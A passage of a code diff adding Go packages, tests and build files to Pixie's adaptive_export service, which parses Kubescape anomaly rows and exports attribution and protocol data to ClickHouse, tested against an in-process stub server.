WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("//bazel:pl_build_system.bzl", "pl_go_test") + +pl_go_test( + name = "e2e_test", + srcs = [ + "e2e_test.go", + "loadtest_test.go", + ], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/controller", + "//src/vizier/services/adaptive_export/internal/sink", + "//src/vizier/services/adaptive_export/internal/trigger", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go new file mode 100644 index 00000000000..4f2f0c2fc94 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go @@ -0,0 +1,176 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package e2e wires the real Trigger + real Sink (both HTTP-backed) +// to a stub ClickHouse in-process and exercises the full +// kubescape→attribution path end-to-end. This is the highest-fidelity +// test that runs in `go test`. Real-cluster validation lives on the +// lab. +package e2e + +import ( + "bytes" + "context" + "encoding/json" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" +) + +// stubClickHouse emulates ClickHouse's HTTP interface: GET responds +// with a fixed kubescape_logs JSONEachRow body; POST records the +// INSERT body for later assertion. +type stubClickHouse struct { + mu sync.Mutex + kubescape []map[string]any + insertedSQL []string + insertBody [][]byte +} + +func (s *stubClickHouse) handle(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("query") + switch r.Method { + case http.MethodGet: + if !strings.Contains(q, "FROM forensic_db.kubescape_logs") { + http.Error(w, "unexpected SELECT: "+q, 400) + return + } + if !strings.Contains(q, "hostname = 'node-1'") { + http.Error(w, "missing hostname filter: "+q, 400) + return + } + s.mu.Lock() + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, row := range s.kubescape { + _ = enc.Encode(row) + } + s.mu.Unlock() + w.WriteHeader(200) + _, _ = w.Write(buf.Bytes()) + case http.MethodPost: + body, _ := io.ReadAll(r.Body) + s.mu.Lock() + s.insertedSQL = append(s.insertedSQL, q) + s.insertBody = append(s.insertBody, body) + s.mu.Unlock() + w.WriteHeader(200) + default: + http.Error(w, "method", http.StatusMethodNotAllowed) + } +} + +func (s *stubClickHouse) bodies() [][]byte { + s.mu.Lock() + defer s.mu.Unlock() + out := make([][]byte, len(s.insertBody)) + for i, b := range s.insertBody { + out[i] = append([]byte{}, b...) + } + return out +} + +func canonicalKubescapeRow() map[string]any { + return map[string]any{ + "RuleID": "R1005", + "RuntimeK8sDetails": `{"podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis"}`, + "RuntimeProcessDetails": `{"processTree":{"pid":106040,"comm":"redis-server"}}`, + "event_time": "1744477360303026359", + "hostname": "node-1", + } +} + +// TestE2E_PushFlow_AttributionRowArrives — full chain: stub-CH serves a +// kubescape row → real Trigger discovers and parses → real Controller +// computes hash + opens active row → real Sink HTTP-POSTs INSERT to +// adaptive_attribution. Assert the resulting body carries the right hash. +func TestE2E_PushFlow_AttributionRowArrives(t *testing.T) { + stub := &stubClickHouse{kubescape: []map[string]any{canonicalKubescapeRow()}} + srv := httptest.NewServer(http.HandlerFunc(stub.handle)) + defer srv.Close() + + trg, err := trigger.New(trigger.Config{ + Endpoint: srv.URL, + Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + }) + if err != nil { + t.Fatalf("trigger.New: %v", err) + } + snk, err := sink.New(sink.Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + cfg := controller.Config{Hostname: "node-1", Before: time.Minute, After: time.Minute} + ctl := controller.New(trg, snk, cfg, nil) + + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = ctl.Run(ctx); close(done) }() + defer func() { + cancel() + select { + case <-done: + case <-time.After(2 * time.Second): + t.Fatalf("controller did not stop within 2s of cancel") + } + }() + + deadline := time.Now().Add(2 * time.Second) + for time.Now().Before(deadline) && len(stub.bodies()) == 0 { + time.Sleep(5 * time.Millisecond) + } + bodies := stub.bodies() + if len(bodies) == 0 { + t.Fatalf("no INSERTs reached stub-CH within 2s") + } + + wantHash := string(anomaly.Hash(anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + })) + matched := false + for _, b := range bodies { + if strings.Contains(string(b), `"anomaly_hash":"`+wantHash+`"`) && + strings.Contains(string(b), `"hostname":"node-1"`) && + strings.Contains(string(b), `"namespace":"redis"`) && + strings.Contains(string(b), `"pid":106040`) { + matched = true + break + } + } + if !matched { + t.Fatalf("no INSERT body had the expected attribution shape; bodies=\n%s", joinBodies(bodies)) + } +} + +func joinBodies(bs [][]byte) string { + out := make([]string, len(bs)) + for i, b := range bs { + out[i] = string(b) + } + return strings.Join(out, "\n---\n") +} diff --git a/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go b/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go new file mode 100644 index 00000000000..3f88e90bf96 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go @@ -0,0 +1,256 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// L1 — hermetic load-test layer for the AE write surface. +// +// This is the deterministic, in-process counterpart to the live (L3) rig +// experiments in /home/croedig/pixie/aeload. It exercises the SAME real +// Trigger + Controller + Sink chain as e2e_test.go, but feeds Pixie's data +// plane from a MOCK PixieQuerier returning a CANNED row set. Both the kubescape +// trigger fixture and the Pixie capture are therefore fully controlled, so the +// AE write surface — control plane (adaptive_attribution) AND data plane +// (per-protocol-table rows + bytes) — is a pure function of the inputs. +// +// Reproducibility is proven by running the whole chain REPS times and asserting +// that every per-table row count, byte total, and the attribution count is +// identical across all reps (std = 0 / a single distinct value). Single-pull is +// forced via PushRefreshInterval = -1 (single-shot), the same effect the L3 +// config achieves on the rig — so the non-deduping MergeTree protocol tables +// never get duplicate re-inserts. +package e2e + +import ( + "context" + "fmt" + "net/http" + "net/http/httptest" + "regexp" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" +) + +// newStubServer starts an httptest server backed by the stub-CH handler. +func newStubServer(s *stubClickHouse) *httptest.Server { + return httptest.NewServer(http.HandlerFunc(s.handle)) +} + +// sqls returns a copy of the recorded INSERT query strings, index-aligned with +// bodies(). +func (s *stubClickHouse) sqls() []string { + s.mu.Lock() + defer s.mu.Unlock() + out := make([]string, len(s.insertedSQL)) + copy(out, s.insertedSQL) + return out +} + +// fixedClock pins now() so the window math is identical every rep. +type fixedClock struct{ t time.Time } + +func (f fixedClock) Now() time.Time { return f.t } + +// cannedQuerier is the mock Pixie data plane: it returns a fixed number of +// fixed rows per protocol table, parsed from the table name embedded in the +// PxL (px.DataFrame(table='')). Everything else returns 0 rows — exactly how +// a silent pod looks to real Pixie. +type cannedQuerier struct { + perTable map[string]int // table -> row count to synthesize +} + +var tableInPxL = regexp.MustCompile(`table='([^']+)'`) + +func (q *cannedQuerier) Query(_ context.Context, pxl string) ([]map[string]any, error) { + m := tableInPxL.FindStringSubmatch(pxl) + if m == nil { + return nil, fmt.Errorf("cannedQuerier: no table in pxl: %s", pxl) + } + n := q.perTable[m[1]] + rows := make([]map[string]any, 0, n) + for i := 0; i < n; i++ { + // Deterministic, fully-specified row. encoding/json sorts map keys, + // so the serialized bytes are byte-identical every rep. + rows = append(rows, map[string]any{ + "time_": 1744477360303026359 + int64(i), + "namespace": "aeload", + "pod": "aeload/gen-l1", + "req_path": fmt.Sprintf("/ping/%d", i), + "table": m[1], + }) + } + return rows, nil +} + +// counts holds the per-rep measurement of what reached "ClickHouse". +type counts struct { + rowsByTable map[string]int + bytesByTable map[string]int + attribution int +} + +// measure parses the stub-CH insert bodies into per-table row/byte counts. +func measure(sqls []string, bodies [][]byte) counts { + c := counts{rowsByTable: map[string]int{}, bytesByTable: map[string]int{}} + insertRe := regexp.MustCompile(`INSERT INTO forensic_db\.(\w+) FORMAT JSONEachRow`) + for i, q := range sqls { + m := insertRe.FindStringSubmatch(q) + if m == nil { + continue + } + table := m[1] + body := bodies[i] + nrows := 0 + for _, line := range strings.Split(strings.TrimRight(string(body), "\n"), "\n") { + if strings.TrimSpace(line) != "" { + nrows++ + } + } + if table == "adaptive_attribution" { + c.attribution += nrows + continue + } + c.rowsByTable[table] += nrows + c.bytesByTable[table] += len(body) + } + return c +} + +// runOnce drives the full Trigger→Controller→Sink chain against a fresh stub-CH +// serving exactly one kubescape row, with the canned Pixie data plane, and +// returns the measured AE write surface. +func runOnce(t *testing.T, perTable map[string]int) counts { + t.Helper() + stub := &stubClickHouse{kubescape: []map[string]any{canonicalKubescapeRow()}} + srv := newStubServer(stub) + defer srv.Close() + + trg, err := trigger.New(trigger.Config{ + Endpoint: srv.URL, + Hostname: "node-1", + PollInterval: 10 * time.Millisecond, + }) + if err != nil { + t.Fatalf("trigger.New: %v", err) + } + snk, err := sink.New(sink.Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + + tables := make([]string, 0, len(perTable)) + for tn := range perTable { + tables = append(tables, tn) + } + cfg := controller.Config{ + Hostname: "node-1", + Before: time.Minute, + After: time.Minute, + PushPixieTables: tables, + PushRefreshInterval: -1, // single-shot: exactly one pull, no MergeTree dup inflation + } + clk := fixedClock{t: time.Unix(1744477370, 0)} // > event_time, so window is open + ctl := controller.New(trg, snk, cfg, clk).WithPixieQuerier(&cannedQuerier{perTable: perTable}) + + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = ctl.Run(ctx); close(done) }() + + // Wait until the attribution row AND all expected protocol-table inserts + // have landed (or timeout). Expected protocol inserts = one per table with + // a non-zero canned count. + wantTables := 0 + for _, n := range perTable { + if n > 0 { + wantTables++ + } + } + deadline := time.Now().Add(3 * time.Second) + for time.Now().Before(deadline) { + c := measure(stub.sqls(), stub.bodies()) + if c.attribution >= 1 && len(c.rowsByTable) >= wantTables { + break + } + time.Sleep(5 * time.Millisecond) + } + cancel() + select { + case <-done: + case <-time.After(2 * time.Second): + t.Fatalf("controller did not stop within 2s") + } + return measure(stub.sqls(), stub.bodies()) +} + +// TestLoad_DataPlaneExactReproducible_L1 — the hermetic reproducibility proof. +func TestLoad_DataPlaneExactReproducible_L1(t *testing.T) { + const reps = 100 + perTable := map[string]int{ + "http_events": 100, + "dns_events": 100, + "pgsql_events": 100, + } + + var first counts + for rep := 0; rep < reps; rep++ { + got := runOnce(t, perTable) + + // Per-rep exactness: write surface == canned input (write ⊇ read with + // equality) + exactly one attribution row. + for tbl, want := range perTable { + if got.rowsByTable[tbl] != want { + t.Fatalf("rep %d: %s rows = %d, want %d", rep, tbl, got.rowsByTable[tbl], want) + } + } + if got.attribution != 1 { + t.Fatalf("rep %d: adaptive_attribution rows = %d, want 1", rep, got.attribution) + } + if len(got.rowsByTable) != len(perTable) { + t.Fatalf("rep %d: unexpected tables written: %v", rep, keysOf(got.rowsByTable)) + } + + if rep == 0 { + first = got + continue + } + // Cross-rep exactness: identical rows AND bytes => std = 0 => CV = 0. + for tbl := range perTable { + if got.rowsByTable[tbl] != first.rowsByTable[tbl] { + t.Fatalf("rep %d: %s row count drifted: %d != %d (rep 0)", rep, tbl, got.rowsByTable[tbl], first.rowsByTable[tbl]) + } + if got.bytesByTable[tbl] != first.bytesByTable[tbl] { + t.Fatalf("rep %d: %s byte total drifted: %d != %d (rep 0)", rep, tbl, got.bytesByTable[tbl], first.bytesByTable[tbl]) + } + } + } + t.Logf("L1 reproducible across %d reps: http=%d(%dB) dns=%d(%dB) pgsql=%d(%dB) attribution=%d", + reps, + first.rowsByTable["http_events"], first.bytesByTable["http_events"], + first.rowsByTable["dns_events"], first.bytesByTable["dns_events"], + first.rowsByTable["pgsql_events"], first.bytesByTable["pgsql_events"], + first.attribution) +} + +func keysOf(m map[string]int) []string { + out := make([]string, 0, len(m)) + for k := range m { + out = append(out, k) + } + return out +} diff --git a/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel new file mode 100644 index 00000000000..47b9b0b3481 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel @@ -0,0 +1,37 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "kubescape", + srcs = ["extract.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) + +pl_go_test( + name = "kubescape_test", + srcs = ["extract_test.go"], + embed = [":kubescape"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract.go b/src/vizier/services/adaptive_export/internal/kubescape/extract.go new file mode 100644 index 00000000000..be51d5159c0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/extract.go @@ -0,0 +1,117 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package kubescape parses the Kubescape-shaped fields of a +// forensic_db.kubescape_logs row into the source-agnostic types used +// downstream: +// - anomaly.Target — workload identity (used to compute the hash) +// - Event — Target plus event-specific fields (event_time, +// rule id, hostname) needed for window math + persistence +// +// This package is the only place in the operator that knows the JSON +// shape of RuntimeK8sDetails / RuntimeProcessDetails. Once an Event +// has been extracted, no further code needs to care that the source +// was Kubescape. +package kubescape + +import ( + "encoding/json" + "errors" + "fmt" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// ErrIncompleteEvent is returned by Extract when one of the required +// fields (event_time, rule id, comm, pid) is missing or unparseable. +// Pod and Namespace are NOT required — host-pid processes legitimately +// run with empty pod / namespace. +var ErrIncompleteEvent = errors.New("kubescape: incomplete event") + +// Row is the operator-facing shape of one forensic_db.kubescape_logs row. +// JSON-encoded fields stay as strings — the operator parses them itself +// to keep the ClickHouse driver layer simple. +type Row struct { + EventTime uint64 // schema: event_time UInt64 (unix nanos) + RuleID string + Hostname string + K8sDetails string // schema: RuntimeK8sDetails String (JSON) + ProcessDetails string // schema: RuntimeProcessDetails String (JSON) +} + +// Event is one parsed kubescape anomaly: workload identity + the bits +// we need for time-window math and ClickHouse persistence. +type Event struct { + Target anomaly.Target + EventTime uint64 // unix nanoseconds — propagated end-to-end + RuleID string // diagnostic only + Hostname string // node-local key +} + +// k8sDetails captures only pod / namespace; ignore the rest so JSON +// evolution upstream doesn't break us. +type k8sDetails struct { + PodName string `json:"podName"` + PodNamespace string `json:"podNamespace"` +} + +type processDetails struct { + ProcessTree struct { + PID uint64 `json:"pid"` + Comm string `json:"comm"` + } `json:"processTree"` +} + +// Extract parses a Row into an Event. Required fields are EventTime, +// RuleID, processTree.pid, processTree.comm. Pod and Namespace MAY be +// empty (host-pid processes outside any pod). Pure: no I/O, no clock. +func Extract(r Row) (Event, error) { + if r.RuleID == "" { + return Event{}, fmt.Errorf("%w: RuleID empty", ErrIncompleteEvent) + } + if r.EventTime == 0 { + return Event{}, fmt.Errorf("%w: EventTime zero", ErrIncompleteEvent) + } + // K8sDetails is OPTIONAL at parse time — host-pid events legitimately + // have no pod/namespace. We only error on malformed JSON. + var k8s k8sDetails + if r.K8sDetails != "" { + if err := json.Unmarshal([]byte(r.K8sDetails), &k8s); err != nil { + return Event{}, fmt.Errorf("%w: parse RuntimeK8sDetails: %v", ErrIncompleteEvent, err) + } + } + var proc processDetails + if err := json.Unmarshal([]byte(r.ProcessDetails), &proc); err != nil { + return Event{}, fmt.Errorf("%w: parse RuntimeProcessDetails: %v", ErrIncompleteEvent, err) + } + if proc.ProcessTree.Comm == "" { + return Event{}, fmt.Errorf("%w: processTree.comm empty", ErrIncompleteEvent) + } + if proc.ProcessTree.PID == 0 { + return Event{}, fmt.Errorf("%w: processTree.pid zero", ErrIncompleteEvent) + } + return Event{ + Target: anomaly.Target{ + PID: proc.ProcessTree.PID, + Comm: proc.ProcessTree.Comm, + Pod: k8s.PodName, + Namespace: k8s.PodNamespace, + }, + EventTime: r.EventTime, + RuleID: r.RuleID, + Hostname: r.Hostname, + }, nil +} diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go new file mode 100644 index 00000000000..90f10500d29 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go @@ -0,0 +1,141 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package kubescape + +import ( + "errors" + "testing" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +const canonicalK8sDetails = `{"clusterName":"bobexample","containerName":"redis","namespace":"redis","podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis","workloadName":"redis","workloadKind":"Deployment"}` + +const canonicalProcessDetails = `{"processTree":{"pid":106040,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":105965,"uid":999}}` + +func canonicalRow() Row { + return Row{ + EventTime: 1744477360303026359, + RuleID: "R1005", + Hostname: "node-1", + K8sDetails: canonicalK8sDetails, + ProcessDetails: canonicalProcessDetails, + } +} + +// TestExtract_FromCanonicalRow — pulls all four target fields plus +// EventTime + RuleID + Hostname from a real-shape kubescape row. +func TestExtract_FromCanonicalRow(t *testing.T) { + ev, err := Extract(canonicalRow()) + if err != nil { + t.Fatalf("Extract: %v", err) + } + if ev.Target.PID != 106040 { + t.Fatalf("PID = %d", ev.Target.PID) + } + if ev.Target.Comm != "redis-server" { + t.Fatalf("Comm = %q", ev.Target.Comm) + } + if ev.Target.Pod != "redis-578d5dc9bd-kjj78" { + t.Fatalf("Pod = %q", ev.Target.Pod) + } + if ev.Target.Namespace != "redis" { + t.Fatalf("Namespace = %q", ev.Target.Namespace) + } + if ev.EventTime != 1744477360303026359 { + t.Fatalf("EventTime = %d", ev.EventTime) + } + if ev.RuleID != "R1005" || ev.Hostname != "node-1" { + t.Fatalf("RuleID/Hostname wrong: %+v", ev) + } +} + +// TestExtract_AllowsEmptyPodNamespace — host-pid processes (no pod) +// must still produce a valid Event. +func TestExtract_AllowsEmptyPodNamespace(t *testing.T) { + row := canonicalRow() + row.K8sDetails = "" // host-pid: no k8s context + ev, err := Extract(row) + if err != nil { + t.Fatalf("Extract empty-k8s row: %v", err) + } + if ev.Target.Pod != "" || ev.Target.Namespace != "" { + t.Fatalf("expected empty Pod/Namespace, got %+v", ev.Target) + } + if ev.Target.PID != 106040 || ev.Target.Comm != "redis-server" { + t.Fatalf("PID/Comm lost: %+v", ev.Target) + } + // And the hash should still compute deterministically. + if h := anomaly.Hash(ev.Target); len(h) != 32 { + t.Fatalf("hash on empty-k8s target invalid: %q", h) + } +} + +// TestExtract_StableUnderJSONReorder — re-ordering JSON keys yields +// identical Target / Event. +func TestExtract_StableUnderJSONReorder(t *testing.T) { + r := canonicalRow() + r.K8sDetails = `{"workloadKind":"Deployment","podNamespace":"redis","podName":"redis-578d5dc9bd-kjj78","clusterName":"bobexample"}` + r.ProcessDetails = `{"processTree":{"comm":"redis-server","ppid":1,"pid":106040,"cmdline":"redis-server","uid":0}}` + a, errA := Extract(canonicalRow()) + b, errB := Extract(r) + if errA != nil || errB != nil { + t.Fatalf("Extract errors: a=%v b=%v", errA, errB) + } + if a.Target != b.Target { + t.Fatalf("Target differs under JSON reorder: %+v vs %+v", a.Target, b.Target) + } + if anomaly.Hash(a.Target) != anomaly.Hash(b.Target) { + t.Fatalf("Hash differs under JSON reorder") + } +} + +// TestExtract_RequiresProcessTreeComm — empty / missing comm errors. +func TestExtract_RequiresProcessTreeComm(t *testing.T) { + for _, p := range []string{"", `{"processTree":}`, `{}`, `{"processTree":{"pid":1}}`, `{"processTree":{"comm":"","pid":1}}`} { + row := canonicalRow() + row.ProcessDetails = p + _, err := Extract(row) + if !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("proc=%q → %v, want ErrIncompleteEvent", p, err) + } + } +} + +// TestExtract_RequiresProcessTreePID — pid is required for hash uniqueness. +func TestExtract_RequiresProcessTreePID(t *testing.T) { + row := canonicalRow() + row.ProcessDetails = `{"processTree":{"comm":"redis-server","pid":0}}` + _, err := Extract(row) + if !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("got %v, want ErrIncompleteEvent for pid=0", err) + } +} + +// TestExtract_RequiresEventTimeAndRuleID — both required. +func TestExtract_RequiresEventTimeAndRuleID(t *testing.T) { + r := canonicalRow() + r.EventTime = 0 + if _, err := Extract(r); !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("EventTime=0 not rejected: %v", err) + } + r = canonicalRow() + r.RuleID = "" + if _, err := Extract(r); !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("RuleID='' not rejected: %v", err) + } +} diff --git a/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel b/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel new file mode 100644 index 00000000000..b1cb579e5be --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel @@ -0,0 +1,47 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "passthrough", + srcs = ["passthrough.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/passthrough", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/clickhouse", + "//src/vizier/services/adaptive_export/internal/pxl", + "//src/vizier/services/adaptive_export/internal/reconcile", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "passthrough_test", + srcs = [ + "compiled_test.go", + "passthrough_test.go", + "reconcile_test.go", + ], + embed = [":passthrough"], + deps = [ + "//src/vizier/services/adaptive_export/internal/clickhouse", + "//src/vizier/services/adaptive_export/internal/reconcile", + "//src/vizier/services/adaptive_export/internal/sink", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go b/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go new file mode 100644 index 00000000000..25f08022154 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go @@ -0,0 +1,136 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package passthrough + +import ( + "context" + "sort" + "sync" + "testing" + "time" +) + +// syncSink records written (table → rowcount) under a mutex so it is safe +// to assert against after the concurrent compiled tick. +type syncSink struct { + mu sync.Mutex + got map[string]int +} + +func newSyncSink() *syncSink { return &syncSink{got: map[string]int{}} } + +func (s *syncSink) WritePixieRows(_ context.Context, table string, rows []map[string]any) error { + s.mu.Lock() + defer s.mu.Unlock() + s.got[table] += len(rows) + return nil +} + +func (s *syncSink) tables() []string { + s.mu.Lock() + defer s.mu.Unlock() + out := make([]string, 0, len(s.got)) + for t := range s.got { + out = append(out, t) + } + sort.Strings(out) + return out +} + +// TestNew_ExcludesHTTP2 proves http2_messages.beta is dropped from the +// firehose set (it isn't materialised on every cluster → "Table not found" +// spam) while another dotted-but-real table (kafka_events.beta) is kept. +func TestNew_ExcludesHTTP2(t *testing.T) { + // Tables nil → defaults to clickhouse.PixieTables() which DOES list + // http2_messages.beta; New must strip it. + loop := New(tableQuerier{n: map[string]int{}}, newSyncSink(), + Config{Window: time.Minute, Compiled: true}) + + for _, tbl := range loop.cfg.Tables { + if tbl == "http2_messages.beta" { + t.Fatalf("http2_messages.beta must be excluded from passthrough tables: %v", loop.cfg.Tables) + } + } + if _, ok := loop.tmpl["http2_messages.beta"]; ok { + t.Fatalf("http2_messages.beta must not be precompiled") + } + // Sanity: a real table is still present + precompiled. + if _, ok := loop.tmpl["http_events"]; !ok { + t.Fatalf("http_events should be precompiled; tmpl=%v", loop.tmpl) + } +} + +// TestCompiledTick_WritesAllTables exercises the concurrent precompiled +// path: every table with rows must be written exactly once. (Running under +// `go test -race` also asserts the fan-out is data-race free.) +func TestCompiledTick_WritesAllTables(t *testing.T) { + sink := newSyncSink() + loop := New( + tableQuerier{n: map[string]int{ + "http_events": 4, + "dns_events": 2, + "conn_stats": 7, + }}, + sink, + Config{ + Window: time.Minute, + Tables: []string{"http_events", "dns_events", "conn_stats"}, + Compiled: true, + }, + ) + loop.tick(context.Background()) + + want := map[string]int{"http_events": 4, "dns_events": 2, "conn_stats": 7} + sink.mu.Lock() + defer sink.mu.Unlock() + if len(sink.got) != len(want) { + t.Fatalf("wrote %v tables, want %v", sink.got, want) + } + for tbl, n := range want { + if sink.got[tbl] != n { + t.Errorf("table %s wrote %d rows, want %d", tbl, sink.got[tbl], n) + } + } +} + +// TestCompiledTick_EqualsLegacy proves the compiled path and the legacy +// serial path write the SAME tables with the SAME row counts for identical +// inputs — the toggle changes performance/structure, not output. +func TestCompiledTick_EqualsLegacy(t *testing.T) { + rows := map[string]int{"http_events": 3, "dns_events": 5, "conn_stats": 1} + tables := []string{"http_events", "dns_events", "conn_stats"} + + run := func(compiled bool) *syncSink { + sink := newSyncSink() + New(tableQuerier{n: rows}, sink, + Config{Window: time.Minute, Tables: tables, Compiled: compiled}). + tick(context.Background()) + return sink + } + + c := run(true) + l := run(false) + + if cs, ls := c.tables(), l.tables(); len(cs) != len(ls) { + t.Fatalf("compiled wrote %v, legacy wrote %v", cs, ls) + } + for tbl, n := range rows { + if c.got[tbl] != n || l.got[tbl] != n { + t.Errorf("table %s: compiled=%d legacy=%d want %d", tbl, c.got[tbl], l.got[tbl], n) + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go b/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go new file mode 100644 index 00000000000..2e551a1907b --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go @@ -0,0 +1,284 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// 